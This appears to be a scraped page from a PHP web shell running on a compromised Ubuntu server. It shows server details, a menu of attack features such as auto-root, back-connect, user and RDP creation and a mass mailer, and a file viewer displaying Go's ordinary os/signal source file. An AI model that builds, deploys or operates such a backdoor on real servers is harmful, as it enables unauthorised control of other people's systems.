Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
os /
signal /
[ HOME SHELL ]
Name
Size
Permission
Action
internal
[ DIR ]
drwxr-xr-x
doc.go
10.85
KB
-rw-r--r--
example_test.go
1001
B
-rw-r--r--
sig.s
410
B
-rw-r--r--
signal.go
6.02
KB
-rw-r--r--
signal_cgo_test.go
6.04
KB
-rw-r--r--
signal_plan9.go
1.06
KB
-rw-r--r--
signal_plan9_test.go
3.82
KB
-rw-r--r--
signal_test.go
16.06
KB
-rw-r--r--
signal_unix.go
1.08
KB
-rw-r--r--
signal_windows_test.go
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : signal_unix.go
// Copyright 2012 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // +build aix darwin dragonfly freebsd js,wasm linux netbsd openbsd solaris windows package signal import ( "os" "syscall" ) // Defined by the runtime package. func signal_disable(uint32) func signal_enable(uint32) func signal_ignore(uint32) func signal_ignored(uint32) bool func signal_recv() uint32 func loop() { for { process(syscall.Signal(signal_recv())) } } func init() { signal_enable(0) // first call - initialize watchSignalLoop = loop } const ( numSig = 65 // max across all systems ) func signum(sig os.Signal) int { switch sig := sig.(type) { case syscall.Signal: i := int(sig) if i < 0 || i >= numSig { return -1 } return i default: return -1 } } func enableSignal(sig int) { signal_enable(uint32(sig)) } func disableSignal(sig int) { signal_disable(uint32(sig)) } func ignoreSignal(sig int) { signal_ignore(uint32(sig)) } func signalIgnored(sig int) bool { return signal_ignored(uint32(sig)) }
Close